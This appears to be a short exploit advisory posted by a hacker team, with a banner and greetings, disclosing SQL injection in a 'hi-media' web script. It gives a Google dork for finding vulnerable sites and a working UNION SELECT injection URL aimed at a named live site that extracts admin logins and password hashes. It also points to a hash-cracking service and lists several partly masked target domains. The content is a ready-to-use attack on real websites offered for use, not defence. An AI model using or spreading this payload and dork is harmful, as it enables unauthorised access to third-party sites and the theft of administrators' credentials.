################################################################## 0101010101 010101010101010 01 01 0101 0101 01 01 0101 0101 01 01 0101 0101 01 01 0101 0101 01 01 0101 0101 01 01 0101 0101 01 01 0101010101 01 01 0101 010 01 01 0101 010 01 01 0101 010 01 01 0101 010 01 01 0101 010 0101010101 0101 010 ################################################################## [+] Exploit Title : hi-media Remote Sql Injection Vulnerability [+] Inj3tion Metod: Sql Injection With No Sql Error [+] Autor : Mr.XpR [+] Contact : No0pm@yahoo.com [+] Researcher Team : IRaNHaCK Security Team (IRaNHaCK.ORG) [+] Script Download : http://www.hi-mediaperformance.fr or http://creafi-online-media.com/ [+] Bug Level : High [+] Test : 7 , Linux Back Track [+] Google Dork : inurl:details.php?id intext:hi-mediaperformance.fr intext:Publicit par hi-mediaperformance.fr ################################################################## [+]Exploit [-] http://www.Site.CoM/patch/details.php?id=[Sqli] [+]Inj3ct [-] http://mil-hotels.org/details.php?id=-17003+union+select+1,2,group_concat%28login,0x3a,pass%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+admins_v234 [+]Crack Hash IN [-] http://www.md5decrypter.co.uk/ [+]Example : [-] http://www.kissxxotels.com/details.php?id=2' [-] http://www.10xxx-hotels.org/details.php?id=2' [-] http://www.mxxxotels.org/details.php?id=2' [-] More In Google ... .::::::::::::::: Persian Gulf For Ever - Tnx To all Persian Hackerz :::::::::::::::. MR.XpR - MMT - UnknowN - FarbodEZRaeL - MR.F@rdin - Inj3Ctor - Black.Viper - ArYaIeIrAn Yaghi.Vahshi - HELLBOY - Monfared - Sokote_Vahshat - Samim.s... And All IraNHAck Security Team Members